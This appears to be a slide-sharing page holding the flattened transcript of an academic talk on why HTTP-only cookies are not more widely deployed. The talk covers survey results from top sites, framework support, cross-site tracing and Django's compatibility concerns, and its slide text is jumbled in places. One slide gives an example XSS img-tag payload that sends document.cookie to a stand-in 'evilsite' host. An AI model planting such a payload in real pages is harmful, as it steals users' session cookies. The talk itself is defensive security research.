Challenges in Widely Deploying HTTP-only Cookies
Despite the security benefits of HTTP-only cookies in preventing cookie theft, their widespread deployment faces challenges due to compatibility concerns, lack of support from major sites and frameworks, and ongoing vulnerability issues. The deployment timeline, survey results, and framework support data shed light on the current status of HTTP-only cookie adoption.
Download Presentation
Please find below an Image/Link to download the presentation.
The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. Download presentation by click this link. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.
E N D
Presentation Transcript
Why arent HTTP-only cookies more widely deployed? Department of Computer Science University of Virginia Yuchen Zhou David Evans
HTTP-only Cookies HTTP-only field prevents cookies from being read via document.cookie. Cookie: Name = value; Domain = value; Expiration time = value; Path = value; Secure Secure; Httponly Cookie: Name = value; Domain = value; Expiration time = value; Path = value; Modify DOM User credentials Send back Disclose user s confidential Evil JS Inject Install trojan <img src = http://evilsite/stealyourcookie.cgi?value=document.cookie>
HTTP-only Deployment Timeline Lots of major sites still don t use HTTP-only cookie HTTP-only cookie Lots of major sites still don t use w3.org specifies that browsers should disallow TRACE XMLHTTPRequests US-CERT vulnerability note on XST attacks Firefox extension supports HTTP-only TRACE method disabled by all major browsers Apache.org compromised by cookie stealing XSS attacks stealing XSS attacks Apache.org compromised by cookie Client/Other Firefox 2.0.0.5 supports HTTP-only. Events IETF standard draft includes HTTP-only IE8 fixes XMLHTTPResponse exploit IE6 introduces HTTP-only 2002 2003 2004 2005 2006 2007 2008 2009 2010 Django developers consider supporting HTTP-only, but compatibility concerns held them back. Server-side Python supports HTTP-only. Django unofficial patch available. Events Still no official Django support for HTTP-only Ruby on Rails supports HTTP-only TRACE method is still on by default on Apache servers and major websites [10] Ruby on Rails sets HTTP-only on by default
Methodology 50 sites collected from Alexa.com world top 100 popular sites. Httponly? Manually registered accounts and collected post-login cookie properties of all sites.
Survey Results Use HTTP-only authentication cookies, 24 Before login, 11 After login, 13 No HTTP-only authentication cookies, 26 No HTTP-only authentication cookies, 26 Kapil Singh et al (2010 Oakland) also gave similar results on the deployment of HTTP-only cookies: HTTP-only: 30/100 16.2% on 100,000
Survey Results on Web Frameworks Frameworks Version Date HTTP-only Support HTTP-only Default 1.1.1 July 2009 No Authkit 0.4.4 July 2009 No Repoze.who 1.0.10 2009 No 2.3.2 Mar 2009 Yes Yes 2.2.2 Nov 2008 Yes No 2.1.2 Oct 2008 No 4.0 Feb 2010 Yes Yes 1.4 Feb 2010 Yes No 3.0 Feb 2010 No No
Why Arent HTTP-only Cookies More Widely Deployed?
Page Functionality Does DOM need to read cookies? Httponly; Only 1 site out of 50 showed a minor malfunction on their web IM gadget. (renren.com)
Can We Circumvent HTTP-only? var cookie Send back Evil JS Inject
Can We Circumvent HTTP-only? Cross-site tracing AJAX based attack 30 30 25 25 0 5 2 6 20 20 15 15 Enable Trace 24 22 21 10 10 20 Insecure 5 5 Disable Trace Secure 0 0
Protection Effectiveness CSRF Hard drive
Software Stack Compatibility Hmm, we probably can't use a patch that requires a patched python. Any different solution? Django Developers Python doesn t support HTTP-only until 2.6 Django is based on python, so the deployment progress is stalled.
Standards Compliance Also, could you point me to where the RFC is talking about 'httponly'? I couldn't find it at all. Django Developers Cookie specification has never been updated since HTTP-only was introduced. Without the specs, the developers are hesitating to make the change.
Difficulty in Deploying in Both Ends Lots of major sites still don t use HTTP-only cookie w3.org specifies that browsers should disallow TRACE XMLHTTPRequests US-CERT vulnerability note on XST attacks Firefox extension supports HTTP-only TRACE method disabled by all major browsers Apache.org compromised by cookie stealing XSS attacks Client/Other Firefox 2.0.0.5 supports HTTP-only. Events IETF standard draft includes HTTP-only IE8 fixes XMLHTTPResponse exploit IE6 introduces HTTP-only 2002 2003 2004 2005 2006 2007 2008 2009 2010 Django developers consider supporting HTTP-only, but compatibility concerns held them back. Server-side Python supports HTTP-only. Django unofficial patch available. Events Still no official Django support for HTTP-only Ruby on Rails supports HTTP-only TRACE method is still on by default on Apache servers and major websites [10] Ruby on Rails sets HTTP-only on by default
Difficulty in Deploying in Both Ends Add HTTP-only field to cookies Interpret HTTP-only field correctly Implement HTTP-only defense correctly Disable Trace and implement Set-cookie securely Similar deployment issues: Set-cookie2 header in RFC2965 Updating TCP protocol
Lessons Learned Maintain backward compatibility Httponly Httponly = true Be aggressive on client side. +Httponly Opt-in? Opt-out!
Thank you! Questions?
Survey Results Kapil Singh et al (2010 Oakland) also proved similar results on the deployment of HTTP- only cookies:
Page Functionality Google analytics?